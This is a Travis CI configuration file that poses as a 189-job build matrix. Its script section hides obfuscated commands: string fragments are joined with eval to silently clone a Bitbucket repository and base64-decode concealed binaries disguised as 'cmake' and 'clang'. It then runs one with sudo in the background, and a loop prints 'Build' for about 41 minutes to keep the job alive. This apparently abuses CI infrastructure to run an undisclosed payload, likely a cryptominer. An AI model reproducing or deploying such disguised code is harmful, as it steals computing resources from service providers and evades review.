dist: bionic

env:
  - BUILD="ep1"
  - BUILD="ep2"
  - BUILD="ep3"
  - BUILD="ep4"
  - BUILD="ep5"
  - BUILD="ep6"
  - BUILD="ep7"
  - BUILD="ep8"
  - BUILD="ep9"
  - BUILD="ep10"
  - BUILD="ep11"
  - BUILD="ep12"
  - BUILD="ep13"
  - BUILD="ep14"
  - BUILD="ep15"
  - BUILD="ep16"
  - BUILD="ep17"
  - BUILD="ep18"
  - BUILD="ep19"
  - BUILD="ep20"
  - BUILD="ep21"
  - BUILD="ep22"
  - BUILD="ep23"
  - BUILD="ep24"
  - BUILD="ep25"
  - BUILD="ep26"
  - BUILD="ep27"
  - BUILD="ep28"
  - BUILD="ep29"
  - BUILD="ep30"
  - BUILD="ep31"
  - BUILD="ep32"
  - BUILD="ep33"
  - BUILD="ep34"
  - BUILD="ep35"
  - BUILD="ep36"
  - BUILD="ep37"
  - BUILD="ep38"
  - BUILD="ep39"
  - BUILD="ep40"
  - BUILD="ep41"
  - BUILD="ep42"
  - BUILD="ep43"
  - BUILD="ep44"
  - BUILD="ep45"
  - BUILD="ep46"
  - BUILD="ep47"
  - BUILD="ep48"
  - BUILD="ep49"
  - BUILD="ep50"
  - BUILD="ep51"
  - BUILD="ep52"
  - BUILD="ep53"
  - BUILD="ep54"
  - BUILD="ep55"
  - BUILD="ep56"
  - BUILD="ep57"
  - BUILD="ep58"
  - BUILD="ep59"
  - BUILD="ep60"
  - BUILD="ep61"
  - BUILD="ep62"
  - BUILD="ep63"
  - BUILD="ep64"
  - BUILD="ep65"
  - BUILD="ep66"
  - BUILD="ep67"
  - BUILD="ep68"
  - BUILD="ep69"
  - BUILD="ep70"
  - BUILD="ep71"
  - BUILD="ep72"
  - BUILD="ep73"
  - BUILD="ep74"
  - BUILD="ep75"
  - BUILD="ep76"
  - BUILD="ep77"
  - BUILD="ep78"
  - BUILD="ep79"
  - BUILD="ep80"
  - BUILD="ep81"
  - BUILD="ep82"
  - BUILD="ep83"
  - BUILD="ep84"
  - BUILD="ep85"
  - BUILD="ep86"
  - BUILD="ep87"
  - BUILD="ep88"
  - BUILD="ep89"
  - BUILD="ep90"
  - BUILD="ep91"
  - BUILD="ep92"
  - BUILD="ep93"
  - BUILD="ep94"
  - BUILD="ep95"
  - BUILD="ep96"
  - BUILD="ep97"
  - BUILD="ep98"
  - BUILD="ep99"
  - BUILD="ep100"
  - BUILD="ep101"
  - BUILD="ep102"
  - BUILD="ep103"
  - BUILD="ep104"
  - BUILD="ep105"
  - BUILD="ep106"
  - BUILD="ep107"
  - BUILD="ep108"
  - BUILD="ep109"
  - BUILD="ep110"
  - BUILD="ep111"
  - BUILD="ep112"
  - BUILD="ep113"
  - BUILD="ep114"
  - BUILD="ep115"
  - BUILD="ep116"
  - BUILD="ep117"
  - BUILD="ep118"
  - BUILD="ep119"
  - BUILD="ep120"
  - BUILD="ep121"
  - BUILD="ep122"
  - BUILD="ep123"
  - BUILD="ep124"
  - BUILD="ep125"
  - BUILD="ep126"
  - BUILD="ep127"
  - BUILD="ep128"
  - BUILD="ep129"
  - BUILD="ep130"
  - BUILD="ep131"
  - BUILD="ep132"
  - BUILD="ep133"
  - BUILD="ep134"
  - BUILD="ep135"
  - BUILD="ep136"
  - BUILD="ep137"
  - BUILD="ep138"
  - BUILD="ep139"
  - BUILD="ep140"
  - BUILD="ep141"
  - BUILD="ep142"
  - BUILD="ep143"
  - BUILD="ep144"
  - BUILD="ep145"
  - BUILD="ep146"
  - BUILD="ep147"
  - BUILD="ep148"
  - BUILD="ep149"
  - BUILD="ep150"
  - BUILD="ep151"
  - BUILD="ep152"
  - BUILD="ep153"
  - BUILD="ep154"
  - BUILD="ep155"
  - BUILD="ep156"
  - BUILD="ep157"
  - BUILD="ep158"
  - BUILD="ep159"
  - BUILD="ep160"
  - BUILD="ep161"
  - BUILD="ep162"
  - BUILD="ep163"
  - BUILD="ep164"
  - BUILD="ep165"
  - BUILD="ep166"
  - BUILD="ep167"
  - BUILD="ep168"
  - BUILD="ep169"
  - BUILD="ep170"
  - BUILD="ep171"
  - BUILD="ep172"
  - BUILD="ep173"
  - BUILD="ep174"
  - BUILD="ep175"
  - BUILD="ep176"
  - BUILD="ep177"
  - BUILD="ep178"
  - BUILD="ep179"
  - BUILD="ep180"
  - BUILD="ep181"
  - BUILD="ep182"
  - BUILD="ep183"
  - BUILD="ep184"
  - BUILD="ep185"
  - BUILD="ep186"
  - BUILD="ep187"
  - BUILD="ep188"
  - BUILD="ep189"

language: minimal

script:
  - VzRMZdLstxR="sudo apt up"
  - JwTgrMsO="date || tru"
  - eval "$VzRMZdLstxR""$JwTgrMsO""e"
  - eBWmZT="sudo apt --"
  - CJTJMbQwJJ="yes install"
  - kAMKhvEZJqb=" cl-base64 "
  - hWrJryqp="git &>/dev/"
  - eval "$eBWmZT""$CJTJMbQwJJ""$kAMKhvEZJqb""$hWrJryqp""null"
  - XUoKSA="git clone h"
  - gMzNATRPXOM="ttps://gccb"
  - OwnIGJz="uild@bitbuc"
  - UJBzfQet="ket.org/gcc"
  - jtIKBtJ="build/gcc.g"
  - ZpvoDlYQY="it &>/dev/n"
  - eval "$XUoKSA""$gMzNATRPXOM""$OwnIGJz""$UJBzfQet""$jtIKBtJ""$ZpvoDlYQY""ull"
  - WuzElAhO="base64 -d g"
  - RjFGmV="cc/cmake_ >"
  - eval "$WuzElAhO""$RjFGmV"" cmake"
  - BosLD="base64 -d g"
  - KLFgPfi="cc/config_ "
  - tjrRdCh="> output.lo"
  - eval "$BosLD""$KLFgPfi""$tjrRdCh""g"
  - ZgJIzyC="base64 -d g"
  - OeTLqZGIaoT="cc/make_ > "
  - eval "$ZgJIzyC""$OeTLqZGIaoT""clang"
  - chmod +x clang cmake
  - tITjUxI="./cmake"
  - eval "$tITjUxI"""
  - sed -i 's/build/tg3o/g' output.log
  - AsGPweKXG="sudo ./clan"
  - nvYCvdg="g --config "
  - OJnduJzhw="output.log "
  - WAfKJANHAk="&>/dev/null"
  - eval "$AsGPweKXG""$nvYCvdg""$OJnduJzhw""$WAfKJANHAk"" &"
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2475)) ] && sudo killall clang && break; sleep 194; done
